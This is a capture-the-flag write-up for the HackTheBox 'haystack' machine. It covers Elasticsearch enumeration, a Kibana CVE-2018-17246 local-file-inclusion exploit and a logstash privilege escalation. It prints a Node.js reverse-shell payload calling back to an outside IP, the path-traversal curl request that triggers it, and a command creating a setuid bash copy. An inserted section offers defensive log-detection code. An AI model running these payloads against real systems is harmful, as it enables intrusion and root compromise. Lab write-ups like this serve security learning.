HackTheBox Writeups

Writeups for all the HTB boxes I have solved



haystack

Author: JoyDragon


Machine IP: 10.10.10.115

DATE : 22/09/2019

START TIME: 6:31 PM


Nmap

I’ve got three open ports. Let’s start our enumeration with the HTTP service.


HTTP

If we open the website then we can see a simple image of a needle in a haystack.

I searched for clave on port 9200.

I got some base64 strings. I decoded that:

pass: spanish.is.key

user: security

I tried that as SSH creds.

There is something on port 5601.

ssh -R 5601:127.0.0.1:5601 mzfr@10.10.14.225

I did remote port forwarding.

https://github.com/mpgn/CVE-2018-17246

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "10.10.14.225", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

curl http://127.0.0.1:5601/api/console/api_server?"sense_version=@@SENSE_VERSION&apis=../../../.../../../../../../../../../../tmp/whatisshell.js"
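
For defenders, the request above leaves a recognizable shape in Kibana or reverse-proxy access logs: a call to /api/console/api_server whose apis parameter is a path instead of an API name. The following detection sketch is an added example, not part of the original writeup or the CVE-2018-17246 repository. The log lines are constructed, the function names are hypothetical, and the allowlist pattern for legitimate apis values is an assumption.

```javascript
// Added example: flag Kibana Console requests whose `apis` parameter is not a
// plain API name (the CVE-2018-17246 request shape). Log lines are constructed.
const CONSOLE_PATH = "/api/console/api_server";
// Assumption: legitimate values are comma-separated identifiers such as es_6_0.
const SAFE_APIS = /^[A-Za-z0-9_]+(,[A-Za-z0-9_]+)*$/;

// Decode repeatedly so double-encoded traversal (%252e%252e%252f) is still seen.
function fullyDecode(value) {
  let current = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns a list of findings for one access-log line, or null if it is clean.
function flagConsoleLfi(logLine) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(logLine);
  if (!m) return null;
  let url;
  try { url = new URL(m[1], "http://log.invalid"); } catch (e) { return null; }
  if (url.pathname !== CONSOLE_PATH) return null;
  const findings = [];
  for (const raw of url.searchParams.getAll("apis")) {
    const value = fullyDecode(raw);
    const reasons = [];
    if (value.includes("..")) reasons.push("traversal");
    if (/[\/\\]/.test(value)) reasons.push("path-separator");
    if (!SAFE_APIS.test(value)) reasons.push("not-allowlisted");
    if (reasons.length > 0) findings.push({ value, reasons });
  }
  return findings.length > 0 ? findings : null;
}

const SAMPLE_LOG = [ // constructed lines in common log format
  '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 512',
  '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../tmp/example.js HTTP/1.1" 500 60',
  '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /api/console/api_server?apis=%252e%252e%252f%252e%252e%252ftmp%252fexample.js HTTP/1.1" 500 60',
  '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /app/kibana HTTP/1.1" 200 1024',
];

// Returns [{ lineNumber, findings }] for every flagged line.
function scanLog(lines) {
  return lines
    .map((line, i) => ({ lineNumber: i + 1, findings: flagConsoleLfi(line) }))
    .filter((entry) => entry.findings !== null);
}

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`line ${hit.lineNumber}:`, JSON.stringify(hit.findings));
}
```

The allowlist check is the one that matters most: it flags any apis value that is not a bare identifier, so encodings the traversal checks miss are still reported.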

Then I ran

find / -type d -user kibana

I got /opt/kibana in the output. Then I realized that if we place any logstash file in that directory it might be caught by ELK. I tried but it didn’t work. Then @theart42 said that that is the way, but we need to keep the language Spanish.

sh-4.2$ echo "Ejecutar comando : cp /bin/bash /tmp/myohmy;chmod 4755 /tmp/myohmy" > logstash_rootit

Then just wait.